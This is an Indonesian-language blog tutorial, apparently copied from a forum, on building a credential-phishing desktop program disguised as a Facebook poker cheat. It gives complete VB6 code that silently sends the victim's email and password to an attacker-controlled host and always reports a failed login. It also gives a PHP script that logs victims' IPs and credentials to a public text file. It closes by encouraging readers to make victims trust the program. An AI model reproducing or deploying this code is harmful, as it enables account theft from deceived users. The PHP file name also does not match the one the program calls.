mungkin agan" sekalian udah tau kan apa itu phising ?
kali ini teknik phising nya kita terapin pada sebuah program desktop
(biasanya kan phising lewat situs)
Sebelumnya baca dulu nih gan sebagai contoh nya :
ada sebuah program kita sebut saja cheat poker facebook program itu akan menyuruh anda untuk login ke facebook menggunakan program tersebut,apabila ingin membuat cheatnya bekerja.user yang tertipu akan login lewat program tersebut di dalam program tersebut terdapat 2 buah textbox dan 1 buah command button.2 textbox itu adalah penampung Email & Password yang akan di kirim ke server kita dan command buttonnya di gunakan untuk meng eksekusi code,setelah code di eksekusi program akan memanggil sebuah file .php yang telah di buat sebelumnya di server kita.file php yang telah di panggil tersebut bertindak mencatat ip korban pengirim,mencacat tanggal pemanggilan file php,dan mencatat Email & Password korban yang telah di masukan di 2 buah textbox yang ada di program tersebut lalu menyimpannya dalam sebuah file text.Ngerti kan gan dengan cara kerja program ini ?
Langsung aja yuk kita praktekin.
Bahan" yang harus agan punya untuk membuat project ini bekerja dengan lancar :
- 1 buah web hosting untuk menampung file php dan file text hasil dari phising kita
- Program VB.6 (Kalo bisa sih yang full version gan)
- Siapin susu juga gan jikalau agan haus
Buka webhosting agan, lalu buat 1 buah file dengan nama mydisha.php
lalu isikan dengan code ini
<?php
$datum=date('d-m-Y / h:i:s a');
$email = $_GET[e];
$password = $_GET[p];
$ip = getenv ('REMOTE_ADDR');
$fl = fopen('Ihiy.txt', 'a');
fwrite($fl, "IP Address : $ip\nDate : $datum\nUsername : $email\nPassword : $password\n\n");
fclose($fl);
$ref = $_SERVER['HTTP_REFERER'];
header("location: $ref");
?>
trus di save gan,
sekarang kita buka Microsoft Visual Basic 6.0
buat 1 buah project baru lalu buat ini :
- Buat 1 Form dengan nama frmUtama
- buat 1 Module dengan nama modConnect
isi code ini kedalam module (modConnect)
Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef _
lpSFlags As Long, ByVal dwReserved As Long) As Long
Const INTERNET_CONNECTION_MODEM = 1
Const INTERNET_CONNECTION_LAN = 2
Const INTERNET_CONNECTION_PROXY = 4
Const INTERNET_CONNECTION_MODEM_BUSY = 8
'Fungsi yang berguna untuk mengecek koneksi internet yang ada di komputer kita menggunakan fungsi api InternetGetConnectedState Function CekInternet(Optional connectMode As Integer) As Boolean
Dim flags As Long
CekInternet = InternetGetConnectedState(flags, 0)
connectMode = flags
End Function
Lalu di form Utama tambahkan 2 buah text box dan 1 buah command button 1 buah label
Textbox pertama di namakan : txtUname
Textbox Kedua di namakan : txtPass
Command button dinamakan : cmdLogin
Label dinamakan : lblInfo
Copykan kode ini kedalam form
lblInfo.Caption = "Memeriksa Koneksi Internet"
If CekInternet = False Then
lblInfo.Caption = "Komputer Anda Tidak Terkoneksi Ke Internet !"
Else
lblInfo.Caption = "Komputer Anda Terkoneksi Dengan Internet"
Me.Caption = "Idho Zander"
End If
End Sub
lalu masukan code ini kedalam cmdLogin
Dim IE As Object
user = LCase(txtUname.Text)
pass = txtPass.Text
If txtUname.Text = "" Then
MsgBox "Kotak Teks masih kosong,silahkan isikan dengan benar !", vbExclamation, "Error"
Else
lblInfo.Caption = "Sedang Login ..."
Set IE = CreateObject("InternetExplorer.Application")
IE.Visible = 0
IE.Navigate "http://www.domainkamu.com/idzan.php?e=" & _
user & "&p=" & pass
Do While IE.Busy
Sleep 200 'sleepnya 200 ajah :p
Loop
IE.Quit
Set IE = Nothing
lblInfo.Caption = "Username/Password Salah !"
MsgBox "Username/Password Salah !", vbExclamation, "Error"
End If
sampai
kapanpun kotak pesan yang memberitahukan kita salah memasukan
password/username akan selalu muncul bila command button di klik
bila sudah compile project kamu,lalu lakukan percobaan
bila ingin melihat hasil lognya agan dapat mengakses
http://www.domainkamu.com/Ihiy.txt
program ini bisa agan pake untuk apa aja
tergantung kreativitas agan aja dalam design programnya agar usernya tertarik & percaya kalau program ini aman :D
Sumber : HN Community
No comments:
Post a Comment